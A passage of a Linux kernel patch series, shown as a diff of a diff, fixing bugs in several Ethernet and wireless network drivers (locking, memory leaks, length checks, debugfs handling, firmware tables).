+ 	clear_bit(n, &fp->bitmask);
+diff --git a/drivers/net/ethernet/microchip/lan966x/lan966x_ptp.c b/drivers/net/ethernet/microchip/lan966x/lan966x_ptp.c
+index a8348437dd87f..61fbabf5bebc3 100644
+--- a/drivers/net/ethernet/microchip/lan966x/lan966x_ptp.c
++++ b/drivers/net/ethernet/microchip/lan966x/lan966x_ptp.c
+@@ -524,9 +524,9 @@ irqreturn_t lan966x_ptp_irq_handler(int irq, void *args)
+ 		if (WARN_ON(!skb_match))
+ 			continue;
+ 
+-		spin_lock(&lan966x->ptp_ts_id_lock);
++		spin_lock_irqsave(&lan966x->ptp_ts_id_lock, flags);
+ 		lan966x->ptp_skbs--;
+-		spin_unlock(&lan966x->ptp_ts_id_lock);
++		spin_unlock_irqrestore(&lan966x->ptp_ts_id_lock, flags);
+ 
+ 		/* Get the h/w timestamp */
+ 		lan966x_get_hwtimestamp(lan966x, &ts, delay);
+diff --git a/drivers/net/ethernet/qlogic/qede/qede_main.c b/drivers/net/ethernet/qlogic/qede/qede_main.c
+index 953f304b8588c..89d64a5a4951a 100644
+--- a/drivers/net/ethernet/qlogic/qede/qede_main.c
++++ b/drivers/net/ethernet/qlogic/qede/qede_main.c
+@@ -960,7 +960,6 @@ static int qede_alloc_fp_array(struct qede_dev *edev)
+ {
+ 	u8 fp_combined, fp_rx = edev->fp_num_rx;
+ 	struct qede_fastpath *fp;
+-	void *mem;
+ 	int i;
+ 
+ 	edev->fp_array = kcalloc(QEDE_QUEUE_CNT(edev),
+@@ -970,14 +969,15 @@ static int qede_alloc_fp_array(struct qede_dev *edev)
+ 		goto err;
+ 	}
+ 
+-	mem = krealloc(edev->coal_entry, QEDE_QUEUE_CNT(edev) *
+-		       sizeof(*edev->coal_entry), GFP_KERNEL);
+-	if (!mem) {
+-		DP_ERR(edev, "coalesce entry allocation failed\n");
+-		kfree(edev->coal_entry);
+-		goto err;
++	if (!edev->coal_entry) {
++		edev->coal_entry = kcalloc(QEDE_MAX_RSS_CNT(edev),
++					   sizeof(*edev->coal_entry),
++					   GFP_KERNEL);
++		if (!edev->coal_entry) {
++			DP_ERR(edev, "coalesce entry allocation failed\n");
++			goto err;
++		}
+ 	}
+-	edev->coal_entry = mem;
+ 
+ 	fp_combined = QEDE_QUEUE_CNT(edev) - fp_rx - edev->fp_num_tx;
+ 
+diff --git a/drivers/net/ethernet/ti/am65-cpsw-nuss.c b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+index 6cda4b7c10cb6..3e17152798554 100644
+--- a/drivers/net/ethernet/ti/am65-cpsw-nuss.c
++++ b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+@@ -2852,6 +2852,7 @@ static int am65_cpsw_nuss_probe(struct platform_device *pdev)
+ 
+ err_free_phylink:
+ 	am65_cpsw_nuss_phylink_cleanup(common);
++	am65_cpts_release(common->cpts);
+ err_of_clear:
+ 	of_platform_device_destroy(common->mdio_dev, NULL);
+ err_pm_clear:
+@@ -2880,6 +2881,7 @@ static int am65_cpsw_nuss_remove(struct platform_device *pdev)
+ 	 */
+ 	am65_cpsw_nuss_cleanup_ndev(common);
+ 	am65_cpsw_nuss_phylink_cleanup(common);
++	am65_cpts_release(common->cpts);
+ 
+ 	of_platform_device_destroy(common->mdio_dev, NULL);
+ 
+diff --git a/drivers/net/ethernet/ti/am65-cpts.c b/drivers/net/ethernet/ti/am65-cpts.c
+index 9535396b28cd9..a297890152d92 100644
+--- a/drivers/net/ethernet/ti/am65-cpts.c
++++ b/drivers/net/ethernet/ti/am65-cpts.c
+@@ -929,14 +929,13 @@ static int am65_cpts_of_parse(struct am65_cpts *cpts, struct device_node *node)
+ 	return cpts_of_mux_clk_setup(cpts, node);
+ }
+ 
+-static void am65_cpts_release(void *data)
++void am65_cpts_release(struct am65_cpts *cpts)
+ {
+-	struct am65_cpts *cpts = data;
+-
+ 	ptp_clock_unregister(cpts->ptp_clock);
+ 	am65_cpts_disable(cpts);
+ 	clk_disable_unprepare(cpts->refclk);
+ }
++EXPORT_SYMBOL_GPL(am65_cpts_release);
+ 
+ struct am65_cpts *am65_cpts_create(struct device *dev, void __iomem *regs,
+ 				   struct device_node *node)
+@@ -1014,18 +1013,12 @@ struct am65_cpts *am65_cpts_create(struct device *dev, void __iomem *regs,
+ 	}
+ 	cpts->phc_index = ptp_clock_index(cpts->ptp_clock);
+ 
+-	ret = devm_add_action_or_reset(dev, am65_cpts_release, cpts);
+-	if (ret) {
+-		dev_err(dev, "failed to add ptpclk reset action %d", ret);
+-		return ERR_PTR(ret);
+-	}
+-
+ 	ret = devm_request_threaded_irq(dev, cpts->irq, NULL,
+ 					am65_cpts_interrupt,
+ 					IRQF_ONESHOT, dev_name(dev), cpts);
+ 	if (ret < 0) {
+ 		dev_err(cpts->dev, "error attaching irq %d\n", ret);
+-		return ERR_PTR(ret);
++		goto reset_ptpclk;
+ 	}
+ 
+ 	dev_info(dev, "CPTS ver 0x%08x, freq:%u, add_val:%u\n",
+@@ -1034,6 +1027,8 @@ struct am65_cpts *am65_cpts_create(struct device *dev, void __iomem *regs,
+ 
+ 	return cpts;
+ 
++reset_ptpclk:
++	am65_cpts_release(cpts);
+ refclk_disable:
+ 	clk_disable_unprepare(cpts->refclk);
+ 	return ERR_PTR(ret);
+diff --git a/drivers/net/ethernet/ti/am65-cpts.h b/drivers/net/ethernet/ti/am65-cpts.h
+index bd08f4b2edd2d..6e14df0be1137 100644
+--- a/drivers/net/ethernet/ti/am65-cpts.h
++++ b/drivers/net/ethernet/ti/am65-cpts.h
+@@ -18,6 +18,7 @@ struct am65_cpts_estf_cfg {
+ };
+ 
+ #if IS_ENABLED(CONFIG_TI_K3_AM65_CPTS)
++void am65_cpts_release(struct am65_cpts *cpts);
+ struct am65_cpts *am65_cpts_create(struct device *dev, void __iomem *regs,
+ 				   struct device_node *node);
+ int am65_cpts_phc_index(struct am65_cpts *cpts);
+@@ -31,6 +32,10 @@ void am65_cpts_estf_disable(struct am65_cpts *cpts, int idx);
+ void am65_cpts_suspend(struct am65_cpts *cpts);
+ void am65_cpts_resume(struct am65_cpts *cpts);
+ #else
++static inline void am65_cpts_release(struct am65_cpts *cpts)
++{
++}
++
+ static inline struct am65_cpts *am65_cpts_create(struct device *dev,
+ 						 void __iomem *regs,
+ 						 struct device_node *node)
+diff --git a/drivers/net/hyperv/netvsc.c b/drivers/net/hyperv/netvsc.c
+index 79f4e13620a46..da737d959e81c 100644
+--- a/drivers/net/hyperv/netvsc.c
++++ b/drivers/net/hyperv/netvsc.c
+@@ -851,6 +851,7 @@ static void netvsc_send_completion(struct net_device *ndev,
+ 	u32 msglen = hv_pkt_datalen(desc);
+ 	struct nvsp_message *pkt_rqst;
+ 	u64 cmd_rqst;
++	u32 status;
+ 
+ 	/* First check if this is a VMBUS completion without data payload */
+ 	if (!msglen) {
+@@ -922,6 +923,23 @@ static void netvsc_send_completion(struct net_device *ndev,
+ 		break;
+ 
+ 	case NVSP_MSG1_TYPE_SEND_RNDIS_PKT_COMPLETE:
++		if (msglen < sizeof(struct nvsp_message_header) +
++		    sizeof(struct nvsp_1_message_send_rndis_packet_complete)) {
++			if (net_ratelimit())
++				netdev_err(ndev, "nvsp_rndis_pkt_complete length too small: %u\n",
++					   msglen);
++			return;
++		}
++
++		/* If status indicates an error, output a message so we know
++		 * there's a problem. But process the completion anyway so the
++		 * resources are released.
++		 */
++		status = nvsp_packet->msg.v1_msg.send_rndis_pkt_complete.status;
++		if (status != NVSP_STAT_SUCCESS && net_ratelimit())
++			netdev_err(ndev, "nvsp_rndis_pkt_complete error status: %x\n",
++				   status);
++
+ 		netvsc_send_tx_complete(ndev, net_device, incoming_channel,
+ 					desc, budget);
+ 		break;
+diff --git a/drivers/net/ipa/gsi.c b/drivers/net/ipa/gsi.c
+index bea2da1c4c51d..f1a3938294866 100644
+--- a/drivers/net/ipa/gsi.c
++++ b/drivers/net/ipa/gsi.c
+@@ -1666,7 +1666,8 @@ static int gsi_generic_command(struct gsi *gsi, u32 channel_id,
+ 	val = u32_encode_bits(opcode, GENERIC_OPCODE_FMASK);
+ 	val |= u32_encode_bits(channel_id, GENERIC_CHID_FMASK);
+ 	val |= u32_encode_bits(GSI_EE_MODEM, GENERIC_EE_FMASK);
+-	val |= u32_encode_bits(params, GENERIC_PARAMS_FMASK);
++	if (gsi->version >= IPA_VERSION_4_11)
++		val |= u32_encode_bits(params, GENERIC_PARAMS_FMASK);
+ 
+ 	timeout = !gsi_command(gsi, GSI_GENERIC_CMD_OFFSET, val);
+ 
+diff --git a/drivers/net/ipa/gsi_reg.h b/drivers/net/ipa/gsi_reg.h
+index 3763359f208f7..e65f2f055cfff 100644
+--- a/drivers/net/ipa/gsi_reg.h
++++ b/drivers/net/ipa/gsi_reg.h
+@@ -372,7 +372,6 @@ enum gsi_general_id {
+ #define GSI_ERROR_LOG_OFFSET \
+ 			(0x0001f200 + 0x4000 * GSI_EE_AP)
+ 
+-/* Fields below are present for IPA v3.5.1 and above */
+ #define ERR_ARG3_FMASK			GENMASK(3, 0)
+ #define ERR_ARG2_FMASK			GENMASK(7, 4)
+ #define ERR_ARG1_FMASK			GENMASK(11, 8)
+diff --git a/drivers/net/tap.c b/drivers/net/tap.c
+index a2be1994b3894..8941aa199ea33 100644
+--- a/drivers/net/tap.c
++++ b/drivers/net/tap.c
+@@ -533,7 +533,7 @@ static int tap_open(struct inode *inode, struct file *file)
+ 	q->sock.state = SS_CONNECTED;
+ 	q->sock.file = file;
+ 	q->sock.ops = &tap_socket_ops;
+-	sock_init_data(&q->sock, &q->sk);
++	sock_init_data_uid(&q->sock, &q->sk, inode->i_uid);
+ 	q->sk.sk_write_space = tap_sock_write_space;
+ 	q->sk.sk_destruct = tap_sock_destruct;
+ 	q->flags = IFF_VNET_HDR | IFF_NO_PI | IFF_TAP;
+diff --git a/drivers/net/tun.c b/drivers/net/tun.c
+index a7d17c680f4a0..745131b2d6dbf 100644
+--- a/drivers/net/tun.c
++++ b/drivers/net/tun.c
+@@ -3448,7 +3448,7 @@ static int tun_chr_open(struct inode *inode, struct file * file)
+ 	tfile->socket.file = file;
+ 	tfile->socket.ops = &tun_socket_ops;
+ 
+-	sock_init_data(&tfile->socket, &tfile->sk);
++	sock_init_data_uid(&tfile->socket, &tfile->sk, inode->i_uid);
+ 
+ 	tfile->sk.sk_write_space = tun_sock_write_space;
+ 	tfile->sk.sk_sndbuf = INT_MAX;
+diff --git a/drivers/net/wireless/ath/ath11k/core.h b/drivers/net/wireless/ath/ath11k/core.h
+index 22460b0abf037..ac34c57e4bc69 100644
+--- a/drivers/net/wireless/ath/ath11k/core.h
++++ b/drivers/net/wireless/ath/ath11k/core.h
+@@ -912,7 +912,6 @@ struct ath11k_base {
+ 	enum ath11k_dfs_region dfs_region;
+ #ifdef CONFIG_ATH11K_DEBUGFS
+ 	struct dentry *debugfs_soc;
+-	struct dentry *debugfs_ath11k;
+ #endif
+ 	struct ath11k_soc_dp_stats soc_stats;
+ 
+diff --git a/drivers/net/wireless/ath/ath11k/debugfs.c b/drivers/net/wireless/ath/ath11k/debugfs.c
+index ccdf3d5ba1ab6..5bb6fd17fdf6f 100644
+--- a/drivers/net/wireless/ath/ath11k/debugfs.c
++++ b/drivers/net/wireless/ath/ath11k/debugfs.c
+@@ -976,10 +976,6 @@ int ath11k_debugfs_pdev_create(struct ath11k_base *ab)
+ 	if (test_bit(ATH11K_FLAG_REGISTERED, &ab->dev_flags))
+ 		return 0;
+ 
+-	ab->debugfs_soc = debugfs_create_dir(ab->hw_params.name, ab->debugfs_ath11k);
+-	if (IS_ERR(ab->debugfs_soc))
+-		return PTR_ERR(ab->debugfs_soc);
+-
+ 	debugfs_create_file("simulate_fw_crash", 0600, ab->debugfs_soc, ab,
+ 			    &fops_simulate_fw_crash);
+ 
+@@ -1001,15 +997,51 @@ void ath11k_debugfs_pdev_destroy(struct ath11k_base *ab)
+ 
+ int ath11k_debugfs_soc_create(struct ath11k_base *ab)
+ {
+-	ab->debugfs_ath11k = debugfs_create_dir("ath11k", NULL);
++	struct dentry *root;
++	bool dput_needed;
++	char name[64];
++	int ret;
++
++	root = debugfs_lookup("ath11k", NULL);
++	if (!root) {
++		root = debugfs_create_dir("ath11k", NULL);
++		if (IS_ERR_OR_NULL(root))
++			return PTR_ERR(root);
++
++		dput_needed = false;
++	} else {
++		/* a dentry from lookup() needs dput() after we don't use it */
++		dput_needed = true;
++	}
++
++	scnprintf(name, sizeof(name), "%s-%s", ath11k_bus_str(ab->hif.bus),
++		  dev_name(ab->dev));
++
++	ab->debugfs_soc = debugfs_create_dir(name, root);
++	if (IS_ERR_OR_NULL(ab->debugfs_soc)) {
++		ret = PTR_ERR(ab->debugfs_soc);
++		goto out;
++	}
++
++	ret = 0;
+ 
+-	return PTR_ERR_OR_ZERO(ab->debugfs_ath11k);
++out:
++	if (dput_needed)
++		dput(root);
++
++	return ret;
+ }
+ 
+ void ath11k_debugfs_soc_destroy(struct ath11k_base *ab)
+ {
+-	debugfs_remove_recursive(ab->debugfs_ath11k);
+-	ab->debugfs_ath11k = NULL;
++	debugfs_remove_recursive(ab->debugfs_soc);
++	ab->debugfs_soc = NULL;
++
++	/* We are not removing ath11k directory on purpose, even if it
++	 * would be empty. This simplifies the directory handling and it's
++	 * a minor cosmetic issue to leave an empty ath11k directory to
++	 * debugfs.
++	 */
+ }
+ EXPORT_SYMBOL(ath11k_debugfs_soc_destroy);
+ 
+diff --git a/drivers/net/wireless/ath/ath11k/dp_rx.c b/drivers/net/wireless/ath/ath11k/dp_rx.c
+index c5a4c34d77499..e964e1b722871 100644
+--- a/drivers/net/wireless/ath/ath11k/dp_rx.c
++++ b/drivers/net/wireless/ath/ath11k/dp_rx.c
+@@ -3126,6 +3126,7 @@ int ath11k_peer_rx_frag_setup(struct ath11k *ar, const u8 *peer_mac, int vdev_id
+ 	if (!peer) {
+ 		ath11k_warn(ab, "failed to find the peer to set up fragment info\n");
+ 		spin_unlock_bh(&ab->base_lock);
++		crypto_free_shash(tfm);
+ 		return -ENOENT;
+ 	}
+ 
+@@ -5022,6 +5023,7 @@ static int ath11k_dp_rx_mon_deliver(struct ath11k *ar, u32 mac_id,
+ 		} else {
+ 			rxs->flag |= RX_FLAG_ALLOW_SAME_PN;
+ 		}
++		rxs->flag |= RX_FLAG_ONLY_MONITOR;
+ 		ath11k_update_radiotap(ar, ppduinfo, mon_skb, rxs);
+ 
+ 		ath11k_dp_rx_deliver_msdu(ar, napi, mon_skb, rxs);
+diff --git a/drivers/net/wireless/ath/ath11k/pci.c b/drivers/net/wireless/ath/ath11k/pci.c
+index 99cf3357c66e1..3c6005ab9a717 100644
+--- a/drivers/net/wireless/ath/ath11k/pci.c
++++ b/drivers/net/wireless/ath/ath11k/pci.c
+@@ -979,7 +979,7 @@ static __maybe_unused int ath11k_pci_pm_suspend(struct device *dev)
+ 	if (ret)
+ 		ath11k_warn(ab, "failed to suspend core: %d\n", ret);
+ 
+-	return ret;
++	return 0;
+ }
+ 
+ static __maybe_unused int ath11k_pci_pm_resume(struct device *dev)
+diff --git a/drivers/net/wireless/ath/ath9k/hif_usb.c b/drivers/net/wireless/ath/ath9k/hif_usb.c
+index 1a2e0c7eeb023..f521dfa2f1945 100644
+--- a/drivers/net/wireless/ath/ath9k/hif_usb.c
++++ b/drivers/net/wireless/ath/ath9k/hif_usb.c
+@@ -561,11 +561,11 @@ static void ath9k_hif_usb_rx_stream(struct hif_device_usb *hif_dev,
+ 			memcpy(ptr, skb->data, rx_remain_len);
+ 
+ 			rx_pkt_len += rx_remain_len;
+-			hif_dev->rx_remain_len = 0;
+ 			skb_put(remain_skb, rx_pkt_len);
+ 
+ 			skb_pool[pool_index++] = remain_skb;
+-
++			hif_dev->remain_skb = NULL;
++			hif_dev->rx_remain_len = 0;
+ 		} else {
+ 			index = rx_remain_len;
+ 		}
+@@ -584,16 +584,21 @@ static void ath9k_hif_usb_rx_stream(struct hif_device_usb *hif_dev,
+ 		pkt_len = get_unaligned_le16(ptr + index);
+ 		pkt_tag = get_unaligned_le16(ptr + index + 2);
+ 
++		/* It is supposed that if we have an invalid pkt_tag or
++		 * pkt_len then the whole input SKB is considered invalid
++		 * and dropped; the associated packets already in skb_pool
++		 * are dropped, too.
++		 */
+ 		if (pkt_tag != ATH_USB_RX_STREAM_MODE_TAG) {
+ 			RX_STAT_INC(hif_dev, skb_dropped);
+-			return;
++			goto invalid_pkt;
+ 		}
+ 
+ 		if (pkt_len > 2 * MAX_RX_BUF_SIZE) {
+ 			dev_err(&hif_dev->udev->dev,
+ 				"ath9k_htc: invalid pkt_len (%x)\n", pkt_len);
+ 			RX_STAT_INC(hif_dev, skb_dropped);
+-			return;
++			goto invalid_pkt;
+ 		}
+ 
+ 		pad_len = 4 - (pkt_len & 0x3);
+@@ -605,11 +610,6 @@ static void ath9k_hif_usb_rx_stream(struct hif_device_usb *hif_dev,
+ 
+ 		if (index > MAX_RX_BUF_SIZE) {
+ 			spin_lock(&hif_dev->rx_lock);
+-			hif_dev->rx_remain_len = index - MAX_RX_BUF_SIZE;
+-			hif_dev->rx_transfer_len =
+-				MAX_RX_BUF_SIZE - chk_idx - 4;
+-			hif_dev->rx_pad_len = pad_len;
+-
+ 			nskb = __dev_alloc_skb(pkt_len + 32, GFP_ATOMIC);
+ 			if (!nskb) {
+ 				dev_err(&hif_dev->udev->dev,
+@@ -617,6 +617,12 @@ static void ath9k_hif_usb_rx_stream(struct hif_device_usb *hif_dev,
+ 				spin_unlock(&hif_dev->rx_lock);
+ 				goto err;
+ 			}
++
++			hif_dev->rx_remain_len = index - MAX_RX_BUF_SIZE;
++			hif_dev->rx_transfer_len =
++				MAX_RX_BUF_SIZE - chk_idx - 4;
++			hif_dev->rx_pad_len = pad_len;
++
+ 			skb_reserve(nskb, 32);
+ 			RX_STAT_INC(hif_dev, skb_allocated);
+ 
+@@ -654,6 +660,13 @@ err:
+ 				 skb_pool[i]->len, USB_WLAN_RX_PIPE);
+ 		RX_STAT_INC(hif_dev, skb_completed);
+ 	}
++	return;
++invalid_pkt:
++	for (i = 0; i < pool_index; i++) {
++		dev_kfree_skb_any(skb_pool[i]);
++		RX_STAT_INC(hif_dev, skb_dropped);
++	}
++	return;
+ }
+ 
+ static void ath9k_hif_usb_rx_cb(struct urb *urb)
+@@ -1411,8 +1424,6 @@ static void ath9k_hif_usb_disconnect(struct usb_interface *interface)
+ 
+ 	if (hif_dev->flags & HIF_USB_READY) {
+ 		ath9k_htc_hw_deinit(hif_dev->htc_handle, unplugged);
+-		ath9k_hif_usb_dev_deinit(hif_dev);
+-		ath9k_destroy_wmi(hif_dev->htc_handle->drv_priv);
+ 		ath9k_htc_hw_free(hif_dev->htc_handle);
+ 	}
+ 
+diff --git a/drivers/net/wireless/ath/ath9k/htc_drv_init.c b/drivers/net/wireless/ath/ath9k/htc_drv_init.c
+index 07ac88fb1c577..96a3185a96d75 100644
+--- a/drivers/net/wireless/ath/ath9k/htc_drv_init.c
++++ b/drivers/net/wireless/ath/ath9k/htc_drv_init.c
+@@ -988,6 +988,8 @@ void ath9k_htc_disconnect_device(struct htc_target *htc_handle, bool hotunplug)
+ 
+ 		ath9k_deinit_device(htc_handle->drv_priv);
+ 		ath9k_stop_wmi(htc_handle->drv_priv);
++		ath9k_hif_usb_dealloc_urbs((struct hif_device_usb *)htc_handle->hif_dev);
++		ath9k_destroy_wmi(htc_handle->drv_priv);
+ 		ieee80211_free_hw(htc_handle->drv_priv->hw);
+ 	}
+ }
+diff --git a/drivers/net/wireless/ath/ath9k/htc_hst.c b/drivers/net/wireless/ath/ath9k/htc_hst.c
+index ca05b07a45e67..fe62ff668f757 100644
+--- a/drivers/net/wireless/ath/ath9k/htc_hst.c
++++ b/drivers/net/wireless/ath/ath9k/htc_hst.c
+@@ -391,7 +391,7 @@ static void ath9k_htc_fw_panic_report(struct htc_target *htc_handle,
+  * HTC Messages are handled directly here and the obtained SKB
+  * is freed.
+  *
+- * Service messages (Data, WMI) passed to the corresponding
++ * Service messages (Data, WMI) are passed to the corresponding
+  * endpoint RX handlers, which have to free the SKB.
+  */
+ void ath9k_htc_rx_msg(struct htc_target *htc_handle,
+@@ -478,6 +478,8 @@ invalid:
+ 		if (endpoint->ep_callbacks.rx)
+ 			endpoint->ep_callbacks.rx(endpoint->ep_callbacks.priv,
+ 						  skb, epid);
++		else
++			goto invalid;
+ 	}
+ }
+ 
+diff --git a/drivers/net/wireless/ath/ath9k/wmi.c b/drivers/net/wireless/ath/ath9k/wmi.c
+index f315c54bd3ac0..19345b8f7bfd5 100644
+--- a/drivers/net/wireless/ath/ath9k/wmi.c
++++ b/drivers/net/wireless/ath/ath9k/wmi.c
+@@ -341,6 +341,7 @@ int ath9k_wmi_cmd(struct wmi *wmi, enum wmi_cmd_id cmd_id,
+ 	if (!time_left) {
+ 		ath_dbg(common, WMI, "Timeout waiting for WMI command: %s\n",
+ 			wmi_cmd_to_name(cmd_id));
++		wmi->last_seq_id = 0;
+ 		mutex_unlock(&wmi->op_mutex);
+ 		return -ETIMEDOUT;
+ 	}
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/chip.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/chip.c
+index 121893bbaa1d7..8073f31be27d9 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/chip.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/chip.c
+@@ -726,17 +726,17 @@ static u32 brcmf_chip_tcm_rambase(struct brcmf_chip_priv *ci)
+ 	case BRCM_CC_43664_CHIP_ID:
+ 	case BRCM_CC_43666_CHIP_ID:
+ 		return 0x200000;
++	case BRCM_CC_4355_CHIP_ID:
+ 	case BRCM_CC_4359_CHIP_ID:
+ 		return (ci->pub.chiprev < 9) ? 0x180000 : 0x160000;
+ 	case BRCM_CC_4364_CHIP_ID:
+ 	case CY_CC_4373_CHIP_ID:
+ 		return 0x160000;
+ 	case CY_CC_43752_CHIP_ID:
++	case BRCM_CC_4377_CHIP_ID:
+ 		return 0x170000;
+ 	case BRCM_CC_4378_CHIP_ID:
+ 		return 0x352000;
+-	case CY_CC_89459_CHIP_ID:
+-		return ((ci->pub.chiprev < 9) ? 0x180000 : 0x160000);
+ 	default:
+ 		brcmf_err("unknown chip: %s\n", ci->pub.name);
+ 		break;
+@@ -1426,8 +1426,8 @@ bool brcmf_chip_sr_capable(struct brcmf_chip *pub)
+ 		addr = CORE_CC_REG(base, sr_control1);
+ 		reg = chip->ops->read32(chip->ctx, addr);
+ 		return reg != 0;
++	case BRCM_CC_4355_CHIP_ID:
+ 	case CY_CC_4373_CHIP_ID:
+-	case CY_CC_89459_CHIP_ID:
+ 		/* explicitly check SR engine enable bit */
+ 		addr = CORE_CC_REG(base, sr_control0);
+ 		reg = chip->ops->read32(chip->ctx, addr);
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/common.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/common.c
+index 4a309e5a5707b..f235beaddddba 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/common.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/common.c
+@@ -299,6 +299,7 @@ int brcmf_c_preinit_dcmds(struct brcmf_if *ifp)
+ 			 err);
+ 		goto done;
+ 	}
++	buf[sizeof(buf) - 1] = '\0';
+ 	ptr = (char *)buf;
+ 	strsep(&ptr, "\n");
+ 
+@@ -319,15 +320,17 @@ int brcmf_c_preinit_dcmds(struct brcmf_if *ifp)
+ 	if (err) {
+ 		brcmf_dbg(TRACE, "retrieving clmver failed, %d\n", err);
+ 	} else {
++		buf[sizeof(buf) - 1] = '\0';
+ 		clmver = (char *)buf;
+-		/* store CLM version for adding it to revinfo debugfs file */
+-		memcpy(ifp->drvr->clmver, clmver, sizeof(ifp->drvr->clmver));
+ 
+ 		/* Replace all newline/linefeed characters with space
+ 		 * character
+ 		 */
+ 		strreplace(clmver, '\n', ' ');
+ 
++		/* store CLM version for adding it to revinfo debugfs file */
++		memcpy(ifp->drvr->clmver, clmver, sizeof(ifp->drvr->clmver));
++
+ 		brcmf_dbg(INFO, "CLM version = %s\n", clmver);
+ 	}
+ 
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/core.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/core.c
+index 83ea251cfcecf..f599d5f896e89 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/core.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/core.c
+@@ -336,6 +336,7 @@ static netdev_tx_t brcmf_netdev_start_xmit(struct sk_buff *skb,
+ 			bphy_err(drvr, "%s: failed to expand headroom\n",
+ 				 brcmf_ifname(ifp));
+ 			atomic_inc(&drvr->bus_if->stats.pktcow_failed);
++			dev_kfree_skb(skb);
+ 			goto done;
+ 		}
+ 	}
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/msgbuf.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/msgbuf.c
+index cec53f934940a..45fbcbdc7d9e4 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/msgbuf.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/msgbuf.c
+@@ -347,8 +347,11 @@ brcmf_msgbuf_alloc_pktid(struct device *dev,
+ 		count++;
+ 	} while (count < pktids->array_size);
+ 
+-	if (count == pktids->array_size)
++	if (count == pktids->array_size) {
++		dma_unmap_single(dev, *physaddr, skb->len - data_offset,
++				 pktids->direction);
+ 		return -ENOMEM;
++	}
+ 
+ 	array[*idx].data_offset = data_offset;
+ 	array[*idx].physaddr = *physaddr;
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
+index b67f6d0810b6c..a9b9b2dc62d4f 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
+@@ -51,18 +51,21 @@ enum brcmf_pcie_state {
+ BRCMF_FW_DEF(43602, "brcmfmac43602-pcie");
+ BRCMF_FW_DEF(4350, "brcmfmac4350-pcie");
+ BRCMF_FW_DEF(4350C, "brcmfmac4350c2-pcie");
++BRCMF_FW_CLM_DEF(4355, "brcmfmac4355-pcie");
++BRCMF_FW_CLM_DEF(4355C1, "brcmfmac4355c1-pcie");
+ BRCMF_FW_CLM_DEF(4356, "brcmfmac4356-pcie");
+ BRCMF_FW_CLM_DEF(43570, "brcmfmac43570-pcie");
+ BRCMF_FW_DEF(4358, "brcmfmac4358-pcie");
+ BRCMF_FW_DEF(4359, "brcmfmac4359-pcie");
+-BRCMF_FW_DEF(4364, "brcmfmac4364-pcie");
++BRCMF_FW_CLM_DEF(4364B2, "brcmfmac4364b2-pcie");
++BRCMF_FW_CLM_DEF(4364B3, "brcmfmac4364b3-pcie");
+ BRCMF_FW_DEF(4365B, "brcmfmac4365b-pcie");
+ BRCMF_FW_DEF(4365C, "brcmfmac4365c-pcie");
+ BRCMF_FW_DEF(4366B, "brcmfmac4366b-pcie");
+ BRCMF_FW_DEF(4366C, "brcmfmac4366c-pcie");
+ BRCMF_FW_DEF(4371, "brcmfmac4371-pcie");
++BRCMF_FW_CLM_DEF(4377B3, "brcmfmac4377b3-pcie");
+ BRCMF_FW_CLM_DEF(4378B1, "brcmfmac4378b1-pcie");
+-BRCMF_FW_DEF(4355, "brcmfmac89459-pcie");
+ 
+ /* firmware config files */
+ MODULE_FIRMWARE(BRCMF_FW_DEFAULT_PATH "brcmfmac*-pcie.txt");
+@@ -78,13 +81,16 @@ static const struct brcmf_firmware_mapping brcmf_pcie_fwnames[] = {
+ 	BRCMF_FW_ENTRY(BRCM_CC_4350_CHIP_ID, 0x000000FF, 4350C),
+ 	BRCMF_FW_ENTRY(BRCM_CC_4350_CHIP_ID, 0xFFFFFF00, 4350),
+ 	BRCMF_FW_ENTRY(BRCM_CC_43525_CHIP_ID, 0xFFFFFFF0, 4365C),
++	BRCMF_FW_ENTRY(BRCM_CC_4355_CHIP_ID, 0x000007FF, 4355),
++	BRCMF_FW_ENTRY(BRCM_CC_4355_CHIP_ID, 0xFFFFF800, 4355C1), /* rev ID 12/C2 seen */
+ 	BRCMF_FW_ENTRY(BRCM_CC_4356_CHIP_ID, 0xFFFFFFFF, 4356),
+ 	BRCMF_FW_ENTRY(BRCM_CC_43567_CHIP_ID, 0xFFFFFFFF, 43570),
+ 	BRCMF_FW_ENTRY(BRCM_CC_43569_CHIP_ID, 0xFFFFFFFF, 43570),
+ 	BRCMF_FW_ENTRY(BRCM_CC_43570_CHIP_ID, 0xFFFFFFFF, 43570),
+ 	BRCMF_FW_ENTRY(BRCM_CC_4358_CHIP_ID, 0xFFFFFFFF, 4358),
+ 	BRCMF_FW_ENTRY(BRCM_CC_4359_CHIP_ID, 0xFFFFFFFF, 4359),
+-	BRCMF_FW_ENTRY(BRCM_CC_4364_CHIP_ID, 0xFFFFFFFF, 4364),
++	BRCMF_FW_ENTRY(BRCM_CC_4364_CHIP_ID, 0x0000000F, 4364B2), /* 3 */
++	BRCMF_FW_ENTRY(BRCM_CC_4364_CHIP_ID, 0xFFFFFFF0, 4364B3), /* 4 */
+ 	BRCMF_FW_ENTRY(BRCM_CC_4365_CHIP_ID, 0x0000000F, 4365B),
+ 	BRCMF_FW_ENTRY(BRCM_CC_4365_CHIP_ID, 0xFFFFFFF0, 4365C),
+ 	BRCMF_FW_ENTRY(BRCM_CC_4366_CHIP_ID, 0x0000000F, 4366B),
